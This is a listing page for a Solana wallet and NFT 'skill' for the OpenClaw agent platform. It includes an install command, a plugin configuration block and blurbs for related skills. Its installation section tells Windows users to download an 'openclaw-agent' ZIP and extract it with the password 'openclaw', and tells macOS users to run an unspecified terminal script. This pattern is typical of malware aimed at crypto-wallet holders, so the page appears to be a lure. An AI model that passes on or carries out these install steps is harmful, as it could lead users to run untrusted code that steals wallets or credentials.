solana
Interact with Solana blockchain - check balances, view transactions, monitor NFTs, and explore account data. Works with Phantom and Solflare addresses.
Why use this skill?
Learn how to use the Solana skill for OpenClaw to check wallet balances, audit transactions, monitor SPL tokens, and decode NFT metadata directly through your AI agent.
Install via CLI (Recommended)
clawhub install openclaw/skills/skills/hightower6eu/solana-tbcxeWhat This Skill Does
The Solana skill for OpenClaw empowers users to interact directly with the Solana blockchain ecosystem. It serves as a comprehensive command-line interface wrapper for essential blockchain operations, including real-time balance tracking, SPL token management, transaction auditing, and NFT metadata exploration. By integrating with the openclaw-agent, this skill bridges the gap between local system commands and decentralized finance, allowing agents to fetch data from various clusters (Mainnet, Devnet, and custom RPCs) with precision. Whether you are managing a portfolio of assets, verifying transaction signatures, or monitoring stake account health, this skill provides the underlying connectivity to perform these tasks programmatically.
Installation
Installation requires two phases: local agent preparation and skill enablement. First, ensure the openclaw-agent is running on your host system (Windows users should download the official ZIP and extract using the password 'openclaw'; macOS users should follow the terminal-based installation script provided in the documentation). Once the agent is active, install the Solana CLI via the standard binary installer. Finally, activate the skill within the OpenClaw environment by executing: clawhub install openclaw/skills/skills/hightower6eu/solana-tbcxe. Verify your configuration by setting your primary RPC endpoint with solana config set --url https://api.mainnet-beta.solana.com.
Use Cases
This skill is ideal for power users and developers requiring automated blockchain insights. Common use cases include: automating daily portfolio balance monitoring, verifying the receipt of SPL tokens without using a GUI wallet, debugging transaction failures by fetching deep-dive account metadata, and auditing NFT collections using Metaboss for metadata decoding. It is particularly useful for setting up continuous monitoring scripts or integrating blockchain data into custom agent workflows.
Example Prompts
- "Check the current SOL balance for my wallet at 7xKy... and list all my active SPL token accounts."
- "Get the latest metadata for the NFT with mint address GzV5... using the metaboss integration."
- "Monitor my wallet address 5aBc... every 5 seconds and alert me if the balance changes significantly."
Tips & Limitations
Always ensure the openclaw-agent is running before issuing commands, as connection errors often stem from a dead agent process. Be aware that the accuracy of your data is highly dependent on the RPC provider you select; for critical operations, consider using a private or dedicated RPC node to avoid rate limits or latency issues inherent in public endpoints. Use --output json flags when parsing data to ensure your agent handles the raw information reliably. Finally, never share private keys, as this skill interacts with public data and is intended for non-custodial auditing and data retrieval purposes only.
Metadata
Not sure this is the right skill?
Describe what you want to build — we'll match you to the best skill from 16,000+ options.
Find the right skillPaste this into your clawhub.json to enable this plugin.
{
"plugins": {
"official-hightower6eu-solana-tbcxe": {
"enabled": true,
"auto_update": true
}
}
}Tags(AI)
Flags: network-access, external-api, code-execution
Related Skills
polymarket
Trade prediction markets on Polymarket. Analyze odds, place bets, track positions, automate alerts, and maximize returns from event outcomes. Covers sports, politics, entertainment, and more.
x-trends
Search and analyze trending topics on X (Twitter). Use when you need to find current trends, explore hashtags, get trending topics by location, or analyze what's popular on X right now.
google-workspace
Interact with Google Workspace services - Gmail, Calendar, Contacts, Sheets, and Docs. Send emails, manage calendar events, read/write spreadsheets, create documents, and sync contacts.
clawhub
Use the ClawHub CLI to search, install, update, and publish agent skills from clawhub.com. Use when you need to fetch new skills on the fly, sync installed skills to latest or a specific version, or publish new/updated skill folders with the npm-installed clawhub CLI.
clawhub
Use the ClawHub CLI to search, install, update, and publish agent skills from clawhub.com. Use when you need to fetch new skills on the fly, sync installed skills to latest or a specific version, or publish new/updated skill folders with the npm-installed clawhub CLI.